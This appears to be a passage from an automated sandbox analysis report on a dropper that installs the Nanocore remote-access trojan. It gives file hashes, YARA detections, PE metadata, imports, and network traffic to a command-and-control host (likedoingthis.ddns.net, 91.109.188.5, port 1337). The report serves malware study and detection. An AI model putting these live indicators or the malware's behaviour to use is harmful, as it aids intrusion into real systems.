          SHA1:1AB105E93771E43BF16A9BC60BB9F468B15BD835
          SHA-256:23BB6678DD0E816EE017F308DFBDD6E9351F5C0C1DE07F835865019F9A3EB982
          SHA-512:EA4944A5D479670EFB6B3A8EE0E9AFC16B83D379CFDB4A58FC5CF9C66D9B41E1F7F91BB37F52E480934D3F33A67DCCEA195C2FF3DAD4B4A59905B3C0B02BA273
          Malicious:true
          Preview: [f....H
          C:\Users\user\Desktop\Main.exe
          Process:C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe
          File Type:PE32+ executable (GUI) x86-64, for MS Windows
          Category:dropped
          Size (bytes):123904
          Entropy (8bit):6.468729186726821
          Encrypted:false
          SSDEEP:3072:e2sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcXDg3iT:fbJhs7QW69hd1MMdxPe9N9uA0hu9TB2h
          MD5:443089CA423FC51A74E6F64B4A910E04
          SHA1:EF47FAFD569A9938778C94DF431EE851943F1BF3
          SHA-256:BCA1AC632692A480E1544814EDD3C8D148A59D2A89935F6941FE627759EEF135
          SHA-512:7D50E5B3ED25648EE839183164912312C22C2E4FCB6116B1E3E26CC477644BD502BD70065EA684BD7176E605A3CB6A8AB3798724E62A8BC38D7080001FCE880D
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 32%
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....msZ........../....2.`.....................@.............................0....................................................................... ..................................................................................H............................code....Z.......\.................. ..`.text........p.......`.............. ..`.rdata..-K.......L...d..............@..@.pdata..............................@..@.data....#..........................@....rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................
          C:\Users\user\Desktop\Service.exe
          Process:C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe
          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
          Category:dropped
          Size (bytes):207360
          Entropy (8bit):7.449966518902096
          Encrypted:false
          SSDEEP:3072:gzEqV6B1jHa6dtJ10jgvzcgi+oG/j9iaMP2s/HIwv5fUisD1NHmB5n7lnQidogwK:gLV6Bta6dtJmakIM5fjsDM5nZQi+nK
          MD5:A54512682E96BF7475C189E0D85C4B1F
          SHA1:7041CD71EA3E68ACDF4F4BF7A948C59C42B66121
          SHA-256:B3043783DD5D3E129E50CE47CFE69A777FCDF4F79DC093DC5B39BA2BFAEEE609
          SHA-512:8EE2D3771C779349C0965FF959F1A3AA87B3EA5A642BDAF3D907B8B7C4062B88239CCA94BA6BD537A52DF3A8627FB1592C90236E6A0A7449A9B231832FA15C5C
          Malicious:true
          Yara Hits:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\Desktop\Service.exe, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\Desktop\Service.exe, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\Desktop\Service.exe, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: C:\Users\user\Desktop\Service.exe, Author: Kevin Breen <kevin@techanarchy.net>
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: Joe Sandbox ML, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 98%
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'.T.....................`........... ........@.. ......................................................................8...W.... ...]........................................................................... ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc....]... ...^..................@..@................t.......H...........T............................................................0..Q........o5.......*.o6....-.&......3+..+.... ....3......1..... 2.... ....3.... .......*.*....0..E.......s7....-(&s8....-&&s9....,$&s:........s;........*.....+.....+.....+.....0..........~....o<...*..0..........~....o=...*..0..........~....o>...*..0..........~....o?...*..0..........~....o@...*..0.............-.&(A...*&+...0..$.......~B........-.(...+.-.&+..B...+.~B...*.0.............-.&(A...*&+...0..

          Static File Info

          General

          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):7.408173003288473
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:01d32b29_by_Libranalysis.exe
          File size:527393
          MD5:01d32b29cf20b16e7dc745f01168bdd5
          SHA1:2603699a808a1ac0a2af21c6496acab3be0aa7c9
          SHA256:e94c70d3dc3ab2496465e73bffc7c5f1bc3963f3ae309a88d5e16d5e54a540ce
          SHA512:4298c76e56d518e4c8f3abffa327c66187052ffbea1c8b00fad25e7c4f99b5729eeda62deea54886e25e751ca2223d92ca109f044d6cf5324229c5c84bc1550d
          SSDEEP:12288:ONpszYhvXWSVJdMaeb2X+t4RJ40JSdICg7XDvrHWbqkAsro0mH:yhvJVJdMf0wfd7IzvrLs80mH
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

          File Icon

          Icon Hash:d49494d6c88ecec2

          Static PE Info

          General

          Entrypoint:0x41ed60
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
          DLL Characteristics:GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Time Stamp:0x606DC419 [Wed Apr 7 14:39:21 2021 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:5
          OS Version Minor:1
          File Version Major:5
          File Version Minor:1
          Subsystem Version Major:5
          Subsystem Version Minor:1
          Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

          Entrypoint Preview

          Instruction
          call 00007F01689B0EA9h
          jmp 00007F01689B088Dh
          cmp ecx, dword ptr [0043E668h]
          jne 00007F01689B0A05h
          ret
          jmp 00007F01689B103Eh
          int3
          int3
          int3
          int3
          int3
          push ebp
          mov ebp, esp
          push esi
          push dword ptr [ebp+08h]
          mov esi, ecx
          call 00007F01689A37A7h
          mov dword ptr [esi], 00435580h
          mov eax, esi
          pop esi
          pop ebp
          retn 0004h
          and dword ptr [ecx+04h], 00000000h
          mov eax, ecx
          and dword ptr [ecx+08h], 00000000h
          mov dword ptr [ecx+04h], 00435588h
          mov dword ptr [ecx], 00435580h
          ret
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          lea eax, dword ptr [ecx+04h]
          mov dword ptr [ecx], 00435568h
          push eax
          call 00007F01689B3BDDh
          pop ecx
          ret
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          push ebp
          mov ebp, esp
          push esi
          mov esi, ecx
          lea eax, dword ptr [esi+04h]
          mov dword ptr [esi], 00435568h
          push eax
          call 00007F01689B3BB7h
          test byte ptr [ebp+08h], 00000001h
          pop ecx
          je 00007F01689B0A0Ch
          push 0000000Ch
          push esi
          call 00007F01689AFFBCh
          pop ecx
          pop ecx
          mov eax, esi
          pop esi
          pop ebp
          retn 0004h
          push ebp
          mov ebp, esp
          sub esp, 0Ch
          lea ecx, dword ptr [ebp-0Ch]
          call 00007F01689A3702h
          push 0043B704h
          lea eax, dword ptr [ebp-0Ch]
          push eax
          call 00007F01689B32B6h

          Rich Headers

          Programming Language:
          • [ C ] VS2008 SP1 build 30729
          • [EXP] VS2015 UPD3.1 build 24215
          • [LNK] VS2015 UPD3.1 build 24215
          • [IMP] VS2008 SP1 build 30729
          • [C++] VS2015 UPD3.1 build 24215
          • [RES] VS2015 UPD3 build 24213

          Data Directories

          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8200x34.rdata
          IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8540x3c.rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000xdfd0.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x710000x2274.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

          Sections

          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x3122a0x31400False0.582943369289data6.7038924647IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          .rdata0x330000xa6120xa800False0.453101748512data5.22369091894IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data0x3e0000x237280x1000False0.36767578125data3.70881866699IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
          .didat0x620000x1880x200False0.435546875data3.28777030897IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
          .rsrc0x630000xdfd00xe000False0.637032645089data6.63675064042IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc0x710000x22740x2400False0.7763671875data6.55895677973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

          Resources

          NameRVASizeTypeLanguageCountry
          PNG0x636500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States
          PNG0x641980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States
          RT_ICON0x657480x568GLS_BINARY_LSB_FIRSTEnglishUnited States
          RT_ICON0x65cb00x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
          RT_ICON0x665580xea8dataEnglishUnited States
          RT_ICON0x674000x468GLS_BINARY_LSB_FIRSTEnglishUnited States
          RT_ICON0x678680x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0EnglishUnited States
          RT_ICON0x689100x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0EnglishUnited States
          RT_ICON0x6aeb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
          RT_DIALOG0x6f5880x286dataEnglishUnited States
          RT_DIALOG0x6f3580x13adataEnglishUnited States
          RT_DIALOG0x6f4980xecdataEnglishUnited States
          RT_DIALOG0x6f2280x12edataEnglishUnited States
          RT_DIALOG0x6eef00x338dataEnglishUnited States
          RT_DIALOG0x6ec980x252dataEnglishUnited States
          RT_STRING0x6ff680x1e2dataEnglishUnited States
          RT_STRING0x701500x1ccdataEnglishUnited States
          RT_STRING0x703200x1b8dataEnglishUnited States
          RT_STRING0x704d80x146Hitachi SH big-endian COFF object file, not stripped, 17152 sections, symbol offset=0x73006500EnglishUnited States
          RT_STRING0x706200x446dataEnglishUnited States
          RT_STRING0x70a680x166dataEnglishUnited States
          RT_STRING0x70bd00x152dataEnglishUnited States
          RT_STRING0x70d280x10adataEnglishUnited States
          RT_STRING0x70e380xbcdataEnglishUnited States
          RT_STRING0x70ef80xd6dataEnglishUnited States
          RT_GROUP_ICON0x6ec300x68dataEnglishUnited States
          RT_MANIFEST0x6f8100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

          Imports

          DLLImport
          KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
          gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

          Possible Origin

          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States

          Network Behavior

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          May 12, 2021 17:34:12.129079103 CEST497081337192.168.2.691.109.188.5
          May 12, 2021 17:34:15.149733067 CEST497081337192.168.2.691.109.188.5
          May 12, 2021 17:34:21.251131058 CEST497081337192.168.2.691.109.188.5
          May 12, 2021 17:34:27.034090042 CEST497161337192.168.2.691.109.188.5
          May 12, 2021 17:34:30.040508986 CEST497161337192.168.2.691.109.188.5
          May 12, 2021 17:34:36.040991068 CEST497161337192.168.2.691.109.188.5
          May 12, 2021 17:34:44.289757013 CEST497261337192.168.2.691.109.188.5
          May 12, 2021 17:34:47.333580017 CEST497261337192.168.2.691.109.188.5
          May 12, 2021 17:34:53.339256048 CEST497261337192.168.2.691.109.188.5
          May 12, 2021 17:35:01.675276041 CEST497351337192.168.2.691.109.188.5
          May 12, 2021 17:35:04.683994055 CEST497351337192.168.2.691.109.188.5
          May 12, 2021 17:35:10.684426069 CEST497351337192.168.2.691.109.188.5
          May 12, 2021 17:35:19.119381905 CEST497451337192.168.2.691.109.188.5
          May 12, 2021 17:35:22.122889996 CEST497451337192.168.2.691.109.188.5
          May 12, 2021 17:35:28.138998032 CEST497451337192.168.2.691.109.188.5
          May 12, 2021 17:35:36.563344955 CEST497471337192.168.2.691.109.188.5
          May 12, 2021 17:35:39.561831951 CEST497471337192.168.2.691.109.188.5
          May 12, 2021 17:35:45.562311888 CEST497471337192.168.2.691.109.188.5
          May 12, 2021 17:35:53.960721016 CEST497521337192.168.2.691.109.188.5
          May 12, 2021 17:35:56.961658955 CEST497521337192.168.2.691.109.188.5
          May 12, 2021 17:36:02.962279081 CEST497521337192.168.2.691.109.188.5
          May 12, 2021 17:36:11.425970078 CEST497531337192.168.2.691.109.188.5
          May 12, 2021 17:36:14.416194916 CEST497531337192.168.2.691.109.188.5

          UDP Packets

          TimestampSource PortDest PortSource IPDest IP
          May 12, 2021 17:34:00.918682098 CEST5507453192.168.2.68.8.8.8
          May 12, 2021 17:34:00.969014883 CEST53550748.8.8.8192.168.2.6
          May 12, 2021 17:34:03.152108908 CEST5451353192.168.2.68.8.8.8
          May 12, 2021 17:34:03.213664055 CEST53545138.8.8.8192.168.2.6
          May 12, 2021 17:34:04.394259930 CEST6204453192.168.2.68.8.8.8
          May 12, 2021 17:34:04.446069002 CEST53620448.8.8.8192.168.2.6
          May 12, 2021 17:34:06.391957045 CEST6379153192.168.2.68.8.8.8
          May 12, 2021 17:34:06.453787088 CEST53637918.8.8.8192.168.2.6
          May 12, 2021 17:34:08.408325911 CEST6426753192.168.2.68.8.8.8
          May 12, 2021 17:34:08.460005999 CEST53642678.8.8.8192.168.2.6
          May 12, 2021 17:34:11.239033937 CEST4944853192.168.2.68.8.8.8
          May 12, 2021 17:34:11.287718058 CEST53494488.8.8.8192.168.2.6
          May 12, 2021 17:34:12.057334900 CEST6034253192.168.2.68.8.8.8
          May 12, 2021 17:34:12.118277073 CEST53603428.8.8.8192.168.2.6
          May 12, 2021 17:34:17.665268898 CEST6134653192.168.2.68.8.8.8
          May 12, 2021 17:34:17.723392963 CEST53613468.8.8.8192.168.2.6
          May 12, 2021 17:34:18.540429115 CEST5177453192.168.2.68.8.8.8
          May 12, 2021 17:34:18.590159893 CEST53517748.8.8.8192.168.2.6
          May 12, 2021 17:34:19.743114948 CEST5602353192.168.2.68.8.8.8
          May 12, 2021 17:34:19.794950008 CEST53560238.8.8.8192.168.2.6
          May 12, 2021 17:34:20.833920956 CEST5838453192.168.2.68.8.8.8
          May 12, 2021 17:34:20.882561922 CEST53583848.8.8.8192.168.2.6
          May 12, 2021 17:34:21.997031927 CEST6026153192.168.2.68.8.8.8
          May 12, 2021 17:34:22.046313047 CEST53602618.8.8.8192.168.2.6
          May 12, 2021 17:34:23.758661985 CEST5606153192.168.2.68.8.8.8
          May 12, 2021 17:34:23.810326099 CEST53560618.8.8.8192.168.2.6
          May 12, 2021 17:34:25.894366980 CEST5833653192.168.2.68.8.8.8
          May 12, 2021 17:34:25.943238974 CEST53583368.8.8.8192.168.2.6
          May 12, 2021 17:34:26.973098993 CEST5378153192.168.2.68.8.8.8
          May 12, 2021 17:34:26.991417885 CEST5406453192.168.2.68.8.8.8
          May 12, 2021 17:34:27.032367945 CEST53537818.8.8.8192.168.2.6
          May 12, 2021 17:34:27.043268919 CEST53540648.8.8.8192.168.2.6
          May 12, 2021 17:34:28.247889996 CEST5281153192.168.2.68.8.8.8
          May 12, 2021 17:34:28.296665907 CEST53528118.8.8.8192.168.2.6
          May 12, 2021 17:34:29.163212061 CEST5529953192.168.2.68.8.8.8
          May 12, 2021 17:34:29.211965084 CEST53552998.8.8.8192.168.2.6
          May 12, 2021 17:34:30.065058947 CEST6374553192.168.2.68.8.8.8
          May 12, 2021 17:34:30.113888979 CEST53637458.8.8.8192.168.2.6
          May 12, 2021 17:34:31.017595053 CEST5005553192.168.2.68.8.8.8
          May 12, 2021 17:34:31.069360971 CEST53500558.8.8.8192.168.2.6
          May 12, 2021 17:34:32.510045052 CEST6137453192.168.2.68.8.8.8
          May 12, 2021 17:34:32.563596964 CEST53613748.8.8.8192.168.2.6
          May 12, 2021 17:34:36.353895903 CEST5033953192.168.2.68.8.8.8
          May 12, 2021 17:34:36.425498962 CEST53503398.8.8.8192.168.2.6
          May 12, 2021 17:34:40.374931097 CEST6330753192.168.2.68.8.8.8
          May 12, 2021 17:34:40.437545061 CEST53633078.8.8.8192.168.2.6
          May 12, 2021 17:34:44.226249933 CEST4969453192.168.2.68.8.8.8
          May 12, 2021 17:34:44.287868977 CEST53496948.8.8.8192.168.2.6
          May 12, 2021 17:34:54.929163933 CEST5498253192.168.2.68.8.8.8
          May 12, 2021 17:34:54.988718033 CEST53549828.8.8.8192.168.2.6
          May 12, 2021 17:34:57.327316999 CEST5001053192.168.2.68.8.8.8
          May 12, 2021 17:34:57.497487068 CEST53500108.8.8.8192.168.2.6
          May 12, 2021 17:34:58.144382954 CEST6371853192.168.2.68.8.8.8
          May 12, 2021 17:34:58.204665899 CEST53637188.8.8.8192.168.2.6
          May 12, 2021 17:34:58.844790936 CEST6211653192.168.2.68.8.8.8
          May 12, 2021 17:34:58.951014996 CEST53621168.8.8.8192.168.2.6
          May 12, 2021 17:34:59.256097078 CEST6381653192.168.2.68.8.8.8
          May 12, 2021 17:34:59.329811096 CEST53638168.8.8.8192.168.2.6
          May 12, 2021 17:34:59.524442911 CEST5501453192.168.2.68.8.8.8
          May 12, 2021 17:34:59.584713936 CEST53550148.8.8.8192.168.2.6
          May 12, 2021 17:35:00.446893930 CEST6220853192.168.2.68.8.8.8
          May 12, 2021 17:35:00.506010056 CEST53622088.8.8.8192.168.2.6
          May 12, 2021 17:35:01.463380098 CEST5757453192.168.2.68.8.8.8
          May 12, 2021 17:35:01.521243095 CEST53575748.8.8.8192.168.2.6
          May 12, 2021 17:35:01.624326944 CEST5181853192.168.2.68.8.8.8
          May 12, 2021 17:35:01.673527956 CEST53518188.8.8.8192.168.2.6
          May 12, 2021 17:35:02.005443096 CEST5662853192.168.2.68.8.8.8
          May 12, 2021 17:35:02.062946081 CEST53566288.8.8.8192.168.2.6
          May 12, 2021 17:35:03.111558914 CEST6077853192.168.2.68.8.8.8
          May 12, 2021 17:35:03.160286903 CEST53607788.8.8.8192.168.2.6
          May 12, 2021 17:35:04.374131918 CEST5379953192.168.2.68.8.8.8
          May 12, 2021 17:35:04.425746918 CEST53537998.8.8.8192.168.2.6
          May 12, 2021 17:35:04.876533031 CEST5468353192.168.2.68.8.8.8
          May 12, 2021 17:35:04.933768034 CEST53546838.8.8.8192.168.2.6
          May 12, 2021 17:35:13.430619001 CEST5932953192.168.2.68.8.8.8
          May 12, 2021 17:35:13.489897966 CEST53593298.8.8.8192.168.2.6
          May 12, 2021 17:35:18.937272072 CEST6402153192.168.2.68.8.8.8
          May 12, 2021 17:35:18.998645067 CEST53640218.8.8.8192.168.2.6
          May 12, 2021 17:35:36.497963905 CEST5612953192.168.2.68.8.8.8
          May 12, 2021 17:35:36.559180975 CEST53561298.8.8.8192.168.2.6
          May 12, 2021 17:35:38.139394045 CEST5817753192.168.2.68.8.8.8
          May 12, 2021 17:35:38.203593016 CEST53581778.8.8.8192.168.2.6
          May 12, 2021 17:35:45.169580936 CEST5070053192.168.2.68.8.8.8
          May 12, 2021 17:35:45.243531942 CEST53507008.8.8.8192.168.2.6
          May 12, 2021 17:35:46.837815046 CEST5406953192.168.2.68.8.8.8
          May 12, 2021 17:35:46.904702902 CEST53540698.8.8.8192.168.2.6
          May 12, 2021 17:35:53.896083117 CEST6117853192.168.2.68.8.8.8
          May 12, 2021 17:35:53.954693079 CEST53611788.8.8.8192.168.2.6
          May 12, 2021 17:36:11.321028948 CEST5701753192.168.2.68.8.8.8
          May 12, 2021 17:36:11.385448933 CEST53570178.8.8.8192.168.2.6

          DNS Queries

          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
          May 12, 2021 17:34:12.057334900 CEST192.168.2.68.8.8.80x226bStandard query (0)likedoingthis.ddns.netA (IP address)IN (0x0001)
          May 12, 2021 17:34:26.973098993 CEST192.168.2.68.8.8.80xce70Standard query (0)likedoingthis.ddns.netA (IP address)IN (0x0001)
          May 12, 2021 17:34:44.226249933 CEST192.168.2.68.8.8.80xe267Standard query (0)likedoingthis.ddns.netA (IP address)IN (0x0001)
          May 12, 2021 17:35:01.624326944 CEST192.168.2.68.8.8.80x2d61Standard query (0)likedoingthis.ddns.netA (IP address)IN (0x0001)
          May 12, 2021 17:35:18.937272072 CEST192.168.2.68.8.8.80x59efStandard query (0)likedoingthis.ddns.netA (IP address)IN (0x0001)
          May 12, 2021 17:35:36.497963905 CEST192.168.2.68.8.8.80xce2eStandard query (0)likedoingthis.ddns.netA (IP address)IN (0x0001)
          May 12, 2021 17:35:53.896083117 CEST192.168.2.68.8.8.80x546dStandard query (0)likedoingthis.ddns.netA (IP address)IN (0x0001)
          May 12, 2021 17:36:11.321028948 CEST192.168.2.68.8.8.80x724eStandard query (0)likedoingthis.ddns.netA (IP address)IN (0x0001)

          DNS Answers

          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
          May 12, 2021 17:34:12.118277073 CEST8.8.8.8192.168.2.60x226bNo error (0)likedoingthis.ddns.net91.109.188.5A (IP address)IN (0x0001)
          May 12, 2021 17:34:27.032367945 CEST8.8.8.8192.168.2.60xce70No error (0)likedoingthis.ddns.net91.109.188.5A (IP address)IN (0x0001)
          May 12, 2021 17:34:44.287868977 CEST8.8.8.8192.168.2.60xe267No error (0)likedoingthis.ddns.net91.109.188.5A (IP address)IN (0x0001)
          May 12, 2021 17:35:01.673527956 CEST8.8.8.8192.168.2.60x2d61No error (0)likedoingthis.ddns.net91.109.188.5A (IP address)IN (0x0001)
          May 12, 2021 17:35:18.998645067 CEST8.8.8.8192.168.2.60x59efNo error (0)likedoingthis.ddns.net91.109.188.5A (IP address)IN (0x0001)
          May 12, 2021 17:35:36.559180975 CEST8.8.8.8192.168.2.60xce2eNo error (0)likedoingthis.ddns.net91.109.188.5A (IP address)IN (0x0001)
          May 12, 2021 17:35:53.954693079 CEST8.8.8.8192.168.2.60x546dNo error (0)likedoingthis.ddns.net91.109.188.5A (IP address)IN (0x0001)
          May 12, 2021 17:36:11.385448933 CEST8.8.8.8192.168.2.60x724eNo error (0)likedoingthis.ddns.net91.109.188.5A (IP address)IN (0x0001)

          Code Manipulations

          Statistics

          Behavior

          Click to jump to process

          System Behavior

          Analysis Process: 01d32b29_by_Libranalysis.exe PID: 6424 Parent PID: 6028

          General

          Start time:17:34:07
          Start date:12/05/2021
          Path:C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe'
          Imagebase:0x1310000
          File size:527393 bytes
          MD5 hash:01D32B29CF20B16E7DC745F01168BDD5
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low

          Analysis Process: Main.exe PID: 6492 Parent PID: 6424

          General

          Start time:17:34:09
          Start date:12/05/2021
          Path:C:\Users\user\Desktop\Main.exe
          Wow64 process (32bit):false
          Commandline:'C:\Users\user\Desktop\Main.exe'
          Imagebase:0x140000000
          File size:123904 bytes
          MD5 hash:443089CA423FC51A74E6F64B4A910E04
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Antivirus matches:
          • Detection: 32%, ReversingLabs
          Reputation:low

          Analysis Process: Service.exe PID: 6520 Parent PID: 6424

          General

          Start time:17:34:09
          Start date:12/05/2021
          Path:C:\Users\user\Desktop\Service.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\user\Desktop\Service.exe'
          Imagebase:0x900000
          File size:207360 bytes
          MD5 hash:A54512682E96BF7475C189E0D85C4B1F
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.604957919.0000000005840000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.604957919.0000000005840000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.604957919.0000000005840000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.597461394.0000000000902000.00000002.00020000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.597461394.0000000000902000.00000002.00020000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.597461394.0000000000902000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
